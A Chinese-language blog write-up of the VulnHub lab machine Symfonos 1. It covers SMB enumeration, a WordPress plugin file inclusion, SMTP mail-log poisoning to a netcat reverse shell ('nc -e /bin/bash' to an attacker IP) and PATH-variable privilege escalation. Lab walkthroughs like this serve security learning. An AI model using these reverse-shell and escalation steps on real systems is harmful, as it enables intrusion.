Symfonos 1--VulnHub系列学习记录
纪要:知识点1.enum4linux、smbclient枚举查看smb服务
2.了解文件包含到邮件日志反弹shell,掌握smtp邮件服务写入命令,对邮件等日志文件目录需要熟悉;
3.掌握PATH变量提权
1.主机发现,端口扫描
2.发现139/445端口开启smb服务,运用enum4linux、smbclient枚举查看
enum4linux 192.168.31.81 枚举发现共享目录anonymous helios,存在用户 helios
先进入目录anonymous,命令:smbclient //192.168.31.81/anonymous
发现txt文件,根据说明依次尝试用可能的密码尝试登录共享目录helios
最后通过helios/qwerty 成功登录helios
在todo.txt文件中发现疑似路径 /h3l105,尝试登录web
web页面是熟悉的cms界面
既然是cms那就wpscan扫描一波瞅瞅 :wpscan --url http://symfonos.local/h3l105/ ,一般而言cms漏洞主要是插件与主题导致的,发现两个插件
发现这两插件都存在文件包含,验证后确定存在
一般存在文件包含可以考虑往日志文件写入命令,从而获取shell,这儿推荐一篇文章,总结的不错
https://resources.infosecinstitute.com/local-file-inclusion-code-execution/#gref
回顾端口扫描,25端口开启有smtp服务,可以往25端口发邮件写入反弹shell命令,再通过访问邮件日志触发命令,对于常见日志目录如Apache:/var/log/apache2/access.log ssh: /var/log/auth.log 熟悉更好
邮件日志文件目录:/var/mail 每个用户文件在各自用户目录下 如www-data : /var/mail/www-data, 用户helios邮件日志如下
下面开始写邮件写入一句话,可以参考文章:https://blog.****.net/crhwkrhpunow61910/article/details/100499629
注意点:键入每个命令之后按1个 Enter 键,data之后输入一句话后要连按2个Enter 键,之后输入英文"." 表示发送数据结束,可以看到邮件写入成功
执行id 验证下
然后执行反弹shell命令 nc -e /bin/bash 192.168.31.41 666 本地开启监听 nc -lvp 666,成功反弹
查找suid权限文件
在这陷入僵局了,查看了下计划任务 exim4-base 本地提权失败,翻阅了下大佬们的历程才知道有通过PATH变量提权一说
参阅大佬文章https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
注意下文件 /opt/statuscheck 通过strings命令查看内容,发现调用了curl命令
附:strings命令输出的字符串长度为4个或4个以上的,长度小于4的字符串将不予打印,我们可以通过-n参数调整,strings -n 2 filename
下面通过PATH变量提权,成功。有一点有点奇怪这儿的shell环境只能用/bin/sh, 用/bin/bash不能成功反弹